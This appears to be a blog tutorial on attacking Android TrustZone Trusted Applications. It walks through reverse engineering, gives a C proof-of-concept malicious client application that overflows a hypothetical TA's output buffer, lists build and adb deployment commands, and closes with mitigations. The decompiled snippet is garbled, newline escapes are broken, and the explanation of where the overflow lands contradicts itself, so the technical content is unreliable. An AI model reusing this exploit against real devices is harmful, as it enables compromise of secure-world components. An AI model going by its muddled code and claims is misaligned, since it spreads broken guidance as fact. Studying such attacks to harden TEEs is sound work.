Android Hacking, Sandboxing, & Security Exploits

Building Malicious Trusted Applications: Crafting PoC Exploits for Android TrustZone

By Antigravity Research Published May 29, 2026 ⏱️ 8 Min Read
Google AdSense Native Placement - Horizontal Top-Post banner

Understanding Android TrustZone and the Trusted Execution Environment (TEE)

Android’s security architecture relies heavily on ARM TrustZone, a hardware-enforced isolation technology. It partitions the system into two distinct environments: the Normal World (where Android runs) and the Secure World (housing the Trusted Execution Environment, TEE). The TEE is designed to protect sensitive operations like cryptographic key management, DRM content playback, and secure boot processes from attacks originating in the Normal World. Trusted Applications (TAs) execute within this Secure World, accessible only through a carefully controlled interface via a Client Application (CA) in the Normal World.

The communication between a CA and a TA occurs through the TEE Client API (e.g., GlobalPlatform TEE Client API). This API allows CAs to open sessions, invoke commands, and exchange data with TAs. Vulnerabilities within TAs or the TEE OS itself can lead to severe security compromises, potentially enabling privilege escalation, data exfiltration, or even compromise of the entire secure boot chain.

Android TrustZone Architecture Overview

At a high level, the TrustZone architecture involves several key components:

  • ARM TrustZone Hardware: Provides the fundamental isolation between Normal and Secure Worlds.
  • TEE Operating System (TEE OS): A small, specialized OS running in the Secure World (e.g., OP-TEE, Trusty, QTEE). It manages resources and executes TAs.
  • Trusted Applications (TAs): Binary code running within the TEE OS, performing sensitive operations.
  • TEE Driver/Supplicant: A kernel driver and userspace daemon in the Normal World that facilitates communication with the TEE OS.
  • Client Applications (CAs): Standard Android applications or services that interact with TAs via the TEE Client API.

Attack Surfaces and Common Vulnerabilities in TrustZone

Exploiting TrustZone often involves identifying flaws in one of these components. Common attack surfaces and vulnerability classes include:

  • Trusted Application (TA) Bugs:
  • Input Validation Errors: TAs often process data from the Normal World. Insufficient validation can lead to buffer overflows, integer overflows, or format string vulnerabilities within the TA.
  • Incorrect Access Control: Flaws in how TAs enforce permissions for CAs, allowing unauthorized operations.
  • Cryptographic Weaknesses: Incorrect implementation of cryptographic algorithms or poor key management.
  • IPC/RPC Vulnerabilities: Flaws in the communication protocol between the CA and TA, such as race conditions or insufficient parameter validation.
  • TEE OS Bugs: Less common but more critical, these would affect the fundamental security guarantees of the TEE itself.
  • Side-Channel Attacks: Exploiting information leakage through timing, power consumption, or electromagnetic emissions to infer secure data.

Setting Up a Research Environment (Conceptual)

Real-world TrustZone exploitation requires a capable environment. While detailed setup is beyond this article’s scope, key aspects include:

  1. Rooted Android Device: Access to the kernel and filesystem is crucial.
  2. Custom Kernel/Firmware: For deeper analysis or injecting custom drivers.
  3. Debugging Tools: JTAG/SWD for hardware debugging, or software debuggers like GDB attached to a TEE OS (if supported).
  4. Reverse Engineering Tools: IDA Pro, Ghidra for analyzing TA binaries and TEE OS components.
  5. TEE SDK/Toolchain: For compiling custom CAs and TAs (e.g., OP-TEE OS build system).

Reverse Engineering Trusted Applications

The first step in crafting an exploit is often to understand the target TA. TAs are typically proprietary, so reverse engineering is essential. TAs are usually located in partitions like /vendor/firmware_mnt/image/tee or similar paths, often with extensions like `.elf` or `.mbn`.

Using tools like Ghidra or IDA Pro, you can load the TA binary. Look for:

  • Exported Functions: These are the entry points for CA calls, often named like TA_CreateEntryPoint, TA_OpenSessionEntryPoint, TA_InvokeCommandEntryPoint, TA_CloseSessionEntryPoint, TA_DestroyEntryPoint.
  • Command Handlers: Inside TA_InvokeCommandEntryPoint, a switch statement typically dispatches different command IDs. Analyze each command handler for potential vulnerabilities.
  • Input Buffers: Pay close attention to how data from the Normal World (in_params, out_params in TEE Client API) is handled, especially with memcpy, strcpy, or array accesses.
// Pseudocode snippet from a decompiled TA_InvokeCommandEntryPoint
TEE_Result TA_InvokeCommandEntryPoint(void *session, uint32_t cmd_id, uint32_t param_types, TEE_Param params[4]) {
    switch (cmd_id) {
        case CMD_GET_SECRET:
            // Vulnerable handler
            if (param_types == TEE_PARAM_TYPES(TEE_PARAM_TYPE_MEMREF_OUTPUT, TEE_PARAM_TYPE_NONE, TEE_PARAM_TYPE_NONE, TEE_PARAM_TYPE_NONE)) {
                TEE_MemRef *output_memref = &params[0].memref;
                if (output_memref->size buffer, g_secret_data, sizeof(g_secret_data));
                return TEE_SUCCESS;
            }
            return TEE_ERROR_BAD_PARAMETERS;
        case CMD_SET_CONFIG:
            // ... other commands ...
        default:
            return TEE_ERROR_BAD_PARAMETERS;
    }
}

Crafting a Proof-of-Concept Exploit: A Vulnerable TA Scenario

Let’s imagine we’ve found a vulnerability: a TA, meant to return a fixed-size secret, doesn’t properly validate the output buffer size provided by the CA. If the CA provides a buffer larger than the secret, the TA might copy more data than intended, leading to an information leak or a heap overflow within the TEE.

Step 1: Identify Target and Vulnerability

Through reverse engineering, we pinpoint CMD_GET_SECRET in the TA, noting the `memcpy` operation and the check for `output_memref->size`. We observe that if `output_memref->size` is *larger* than `sizeof(g_secret_data)`, the TA still performs `memcpy(output_memref->buffer, g_secret_data, sizeof(g_secret_data))`. This specific example isn’t a direct overflow, but the key is insufficient validation. A more direct overflow would be if the TA *always* copied a fixed large size, regardless of `output_memref->size`.

For a direct overflow, let’s assume the TA code was:

// MISTAKE: Always copies 0x100 bytes, ignoring provided buffer size
memcpy(output_memref->buffer, g_secret_data_large, 0x100);

If `output_memref->size` is less than `0x100`, this would be an overflow!

Step 2: Develop a Malicious Client Application (CA)

We’ll write a simple C application that acts as our malicious CA. This CA will call the vulnerable TA and exploit the buffer overflow.

#include <stdio.h>
#include <string.h>
#include <tee_client_api.h>

// UUID of the vulnerable TA (replace with actual TA UUID)
#define TA_VULN_UUID {
    0x12345678, 0x1234, 0x1234, 
    { 0x12, 0x34, 0x56, 0x78, 0x90, 0xab, 0xcd, 0xef }
}

#define CMD_GET_SECRET 0x1

int main() {
    TEEC_Context ctx;
    TEEC_Session sess;
    TEEC_Result res;
    TEEC_UUID uuid = TA_VULN_UUID;
    TEEC_Operation op;
    uint32_t err_origin;

    // 1. Initialize a context connecting us to the TEE
    res = TEEC_InitializeContext(NULL, &ctx);
    if (res != TEEC_SUCCESS) {
        fprintf(stderr, "TEEC_InitializeContext failed with code 0x%xn", res);
        return -1;
    }

    // 2. Open a session to the TA
    res = TEEC_OpenSession(&ctx, &sess, &uuid, TEEC_LOGIN_PUBLIC, NULL, NULL, &err_origin);
    if (res != TEEC_SUCCESS) {
        fprintf(stderr, "TEEC_OpenSession failed with code 0x%x origin 0x%xn", res, err_origin);
        TEEC_FinalizeContext(&ctx);
        return -1;
    }

    // 3. Prepare the operation for the vulnerable command
    memset(&op, 0, sizeof(op));
    op.paramTypes = TEEC_PARAM_TYPES(TEEC_MEMREF_TEMP_OUTPUT, TEEC_NONE, TEEC_NONE, TEEC_NONE);

    // Provide a buffer smaller than the expected copy size (e.g., 0x50 if TA copies 0x100)
    // This will trigger the overflow in the TA's memcpy
    char overflow_buffer[0x50]; 
    op.params[0].memref.buffer = overflow_buffer;
    op.params[0].memref.size = sizeof(overflow_buffer);

    fprintf(stdout, "Attempting to invoke CMD_GET_SECRET with a small buffer (size: %zu)...n", sizeof(overflow_buffer));

    res = TEEC_InvokeCommand(&sess, CMD_GET_SECRET, &op, &err_origin);

    if (res != TEEC_SUCCESS) {
        fprintf(stderr, "TEEC_InvokeCommand failed with code 0x%x origin 0x%xn", res, err_origin);
        // Depending on TEE OS, this might crash, return error, or simply corrupt memory
    } else {
        fprintf(stdout, "TEEC_InvokeCommand succeeded. Buffer content (potentially corrupted):n");
        for (int i = 0; i < sizeof(overflow_buffer); i++) {
            fprintf(stdout, "%02x ", (unsigned char)overflow_buffer[i]);
            if ((i + 1) % 16 == 0) fprintf(stdout, "n");
        }
        fprintf(stdout, "n");
    }

    // 4. Close the session and finalize context
    TEEC_CloseSession(&sess);
    TEEC_FinalizeContext(&ctx);

    return 0;
}

Step 3: Compile and Deploy the CA

Assuming an Android NDK environment or cross-compilation setup:

# Cross-compile for Android ARM64
$ aarch64-linux-android-gcc -o exploit_ca exploit_ca.c -I/path/to/optee_client/include -L/path/to/optee_client/lib -lteec

# Push to device
$ adb push exploit_ca /data/local/tmp/

# Execute on device
$ adb shell
# cd /data/local/tmp/
# ./exploit_ca

Upon execution, if the TA has the described vulnerability, the memcpy within the TA will attempt to write 0x100 bytes into a 0x50 byte buffer in the Secure World’s stack/heap. This could lead to a TEE crash, a controlled write of data into adjacent memory, or potentially the leakage of sensitive data from the TEE’s memory to the Normal World through an extended `op.params[0].memref.size` (if the TA writes past its bounds into a larger provided buffer). In a more sophisticated exploit, this overflow could be used to corrupt control flow, leading to arbitrary code execution within the Secure World.

Mitigation and Defense Strategies

Preventing TrustZone exploits requires rigorous development and auditing practices:

  • Strict Input Validation: TAs must meticulously validate all input parameters, especially sizes and pointers, received from the Normal World.
  • Memory Safety: Use safe memory handling functions, and consider memory protection mechanisms like ASLR and stack canaries within the TEE OS if supported.
  • Least Privilege: TAs should have the minimum necessary privileges and access only to required resources.
  • Secure Coding Best Practices: Adhere to secure coding guidelines to prevent common vulnerabilities like buffer overflows, integer issues, and race conditions.
  • Regular Audits and Fuzzing: Conduct security audits and extensive fuzzing of TAs and the TEE OS.
  • Hardware-backed Protections: Utilize all available hardware security features provided by the ARM architecture.

Exploiting TrustZone presents significant challenges but also offers profound insights into the foundational security layers of modern Android devices. By understanding these vulnerabilities and attack vectors, we can better secure these critical trusted environments.

Android Mobile Specs & Compare Directory

Are you researching mobile hardware properties, processor SoCs, GPU chipsets, or RAM configurations? Access our complete specs catalog to compare up to 5 devices side-by-side!

Compare Devices Specs →
Google AdSense Inline Placement - Content Footer banner
Tags: #Android Security #Exploitation #Reverse Engineering #TEE #TrustZone

Related Technical Guides

Troubleshooting ASLR Bypass: Debugging Common Android ARM64 Exploit Failures

May 30, 2026

Bypassing Android Binder Security Measures: Exploiting Misconfigurations and Design Flaws

May 30, 2026

Deep Dive: Android Kernel Memory Management & How UAF Exploits Bypass It

May 30, 2026